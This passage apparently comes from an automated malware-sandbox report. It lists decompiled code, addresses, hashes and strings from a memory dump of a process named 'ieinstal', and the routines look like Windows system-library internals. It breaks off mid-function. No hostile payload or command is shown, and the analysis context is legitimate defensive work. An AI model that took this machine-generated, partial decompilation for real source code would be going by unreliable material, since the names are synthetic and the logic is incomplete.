                        0x1ed11c1b
                        0x1ed11c1f
                        0x1ed11c31
                        0x1ed11c33
                        0x1ed67026
                        0x1ed67026
                        0x1ed11c21
                        0x1ed11c24
                        0x1ed11c24
                        0x1ed11bee
                        0x1ed11bee
                        0x1ed11bf2
                        0x1ed11c3a
                        0x1ed11bf4
                        0x1ed11bf4
                        0x1ed11c05
                        0x1ed11c05
                        0x1ed11c09
                        0x1ed11c3e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed11c09
                        0x1ed11bec
                        0x1ed11be0
                        0x1ed11bae
                        0x1ed11c2e

                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: WindowsExcludedProcs
                        • API String ID: 0-3583428290
                        • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                        • Instruction ID: 4a3c7477cdbcb96d086ebbd17538fece90b39c6330d460939660acfd3b44ed06
                        • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                        • Instruction Fuzzy Hash: 5121F23A900239ABDB118BAAD840F4BB7FFAF85A50F164626FD449F204E631DC0087B0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED2F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1ED2F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                        0x1ed2f71d
                        0x1ed2f722
                        0x1ed2f726
                        0x1ed74770
                        0x1ed2f765
                        0x1ed2f769
                        0x1ed2f769
                        0x1ed2f732
                        0x1ed7477a
                        0x00000000
                        0x1ed7477a
                        0x1ed2f738
                        0x1ed2f73a
                        0x1ed2f73c
                        0x1ed2f73f
                        0x1ed2f746
                        0x1ed2f778
                        0x1ed2f7a9
                        0x1ed2f7a9
                        0x1ed2f754
                        0x1ed2f75a
                        0x1ed2f75d
                        0x1ed2f75f
                        0x1ed2f761
                        0x1ed2f76f
                        0x1ed2f771
                        0x1ed2f771
                        0x1ed2f76f
                        0x1ed2f763
                        0x00000000
                        0x1ed2f763
                        0x1ed2f77d
                        0x1ed2f7a3
                        0x1ed2f7a5
                        0x00000000
                        0x1ed2f7a5
                        0x1ed2f77f
                        0x1ed2f782
                        0x1ed2f784
                        0x1ed2f786
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed2f788
                        0x1ed2f748
                        0x1ed2f74d
                        0x1ed2f78d
                        0x1ed2f793
                        0x1ed2f7b7
                        0x1ed2f7bc
                        0x00000000
                        0x1ed2f7bc
                        0x1ed2f798
                        0x00000000
                        0x00000000
                        0x1ed2f79d
                        0x1ed2f7b0
                        0x00000000
                        0x1ed2f7b0
                        0x1ed2f79f
                        0x00000000
                        0x1ed2f74f
                        0x1ed2f74f
                        0x00000000
                        0x1ed2f74f

                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: Actx
                        • API String ID: 0-89312691
                        • Opcode ID: e2eb65b02559d1f5399c39cc5bf06526eac85d5a76a1c4a16d3663f37b7fdfa0
                        • Instruction ID: a7820ad07089b4799577eb7480a84283ee1c47711d1ce3fb4af0a0b32c5b9193
                        • Opcode Fuzzy Hash: e2eb65b02559d1f5399c39cc5bf06526eac85d5a76a1c4a16d3663f37b7fdfa0
                        • Instruction Fuzzy Hash: B811C4357047438BEF154E1AC9A07167297EB9562CFA14FBAE8A1FB395DB70C8C18340
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDB8DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                        Download Yara Rule
                        C-Code - Quality: 71%
                        			E1EDB8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1ede0d50);
				E1ED5D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E1ED95720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L1ED5DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L1ED5DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E1ED5D130(_t34, _t39, _t40);
			}





                        0x1edb8df1
                        0x1edb8df1
                        0x1edb8df1
                        0x1edb8df1
                        0x1edb8df1
                        0x1edb8df1
                        0x1edb8df3
                        0x1edb8df8
                        0x1edb8dfd
                        0x1edb8e00
                        0x1edb8e0e
                        0x1edb8e2a
                        0x1edb8e36
                        0x1edb8e38
                        0x1edb8e3c
                        0x1edb8e46
                        0x1edb8e46
                        0x1edb8e36
                        0x1edb8e50
                        0x1edb8e56
                        0x1edb8e59
                        0x1edb8e5c
                        0x1edb8e60
                        0x1edb8e67
                        0x1edb8e6d
                        0x1edb8e73
                        0x1edb8e74
                        0x1edb8eb1
                        0x1edb8ebd

                        Strings
                        • Critical error detected %lx, xrefs: 1EDB8E21
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: Critical error detected %lx
                        • API String ID: 0-802127002
                        • Opcode ID: ac78051f2cc2c4c5d145dab09061705db91b7c2e69cca9b793c3f21f450892cb
                        • Instruction ID: 7d9835272bff5642f8ee37bbca7be4b199a78c09118b0a3306fb409cb7fd3153
                        • Opcode Fuzzy Hash: ac78051f2cc2c4c5d145dab09061705db91b7c2e69cca9b793c3f21f450892cb
                        • Instruction Fuzzy Hash: C4115379C10388DBDF15CFA8890678DFBB1AB05310F20466EE46AAB382D3315602CF24
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED9FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                        Download Yara Rule
                        Strings
                        • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 1ED9FF60
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                        • API String ID: 0-1911121157
                        • Opcode ID: 3abf96941ad6f6a04bdcab2235cf8963958688917912e8d98b6b9a3f03cd9d6d
                        • Instruction ID: 3d9db8ec32beaba84bee7aef84595a2763d8877ad8c3e93d77c0205ba11b4c65
                        • Opcode Fuzzy Hash: 3abf96941ad6f6a04bdcab2235cf8963958688917912e8d98b6b9a3f03cd9d6d
                        • Instruction Fuzzy Hash: 2F11AD75910184EFDF12CF50CD54FA8BBB2FF08705F618694E50AAB2A1C739E985EB60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDD5BA5, Relevance: .6, Instructions: 592COMMON
                        Download Yara Rule
                        C-Code - Quality: 88%
                        			E1EDD5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1ede1178);
				E1ED5D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E1EDD4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E1ED4D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E1EDD5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x1edf60e8;
								if( *0x1edf60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x1edf60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E1ED49710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E1ED46DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E1ED4F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E1ED4F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E1ED4F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E1ED4FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E1ED4FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E1ED4F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E1ED4F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E1EDD4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
